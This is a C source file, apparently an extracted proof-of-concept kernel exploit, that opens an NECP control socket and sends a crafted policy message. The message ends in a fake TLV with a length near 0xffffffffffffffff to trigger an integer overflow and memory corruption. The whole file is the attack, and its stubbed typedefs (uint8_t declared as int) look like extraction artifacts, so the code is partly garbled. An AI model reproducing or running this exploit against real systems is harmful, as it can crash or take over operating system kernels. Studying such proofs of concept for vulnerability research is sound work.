
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint8_t ;
typedef int uint32_t ;
struct necp_packet_header {int packet_type; scalar_t__ message_id; scalar_t__ flags; } ;


 int* add_fake_tlv (int*,int,int,int*,int) ;
 int* add_real_tlv (int*,int,int,int*) ;
 int close (int) ;
 int ctl_open () ;
 int* malloc (int) ;
 int memset (int*,char,int) ;
 int printf (char*,...) ;
 int send (int,int*,size_t,int ) ;

int main(){
  int fd = ctl_open();
  if (fd < 0) {
    printf("failed to get control socket :(\n");
    return 1;
  }
  printf("got a control socket! %d\n", fd);

  size_t msg_size;
  uint8_t* msg = malloc(0x1000);
  memset(msg, 0, 0x1000);

  uint8_t* payload = malloc(0x1000);
  memset(payload, 'A', 0x1000);

  struct necp_packet_header* hdr = (struct necp_packet_header*) msg;
  hdr->packet_type = 1;
  hdr->flags = 0;
  hdr->message_id = 0;

  uint8_t* buf = (uint8_t*)(hdr+1);

  uint32_t order = 0x41414141;
  buf = add_real_tlv(buf, 2, 4, &order);

  uint8_t policy = 1;
  buf = add_real_tlv(buf, 4, 1, &policy);

  buf = add_real_tlv(buf, 3, 1, payload);
  buf = add_real_tlv(buf, 3, 1024, payload);

  buf = add_fake_tlv(buf, 3, 0xffffffffffffffff-1050, payload, 0x10);

  msg_size = buf - msg;

  send(fd, msg, msg_size, 0);

  close(fd);
  return 0;
}
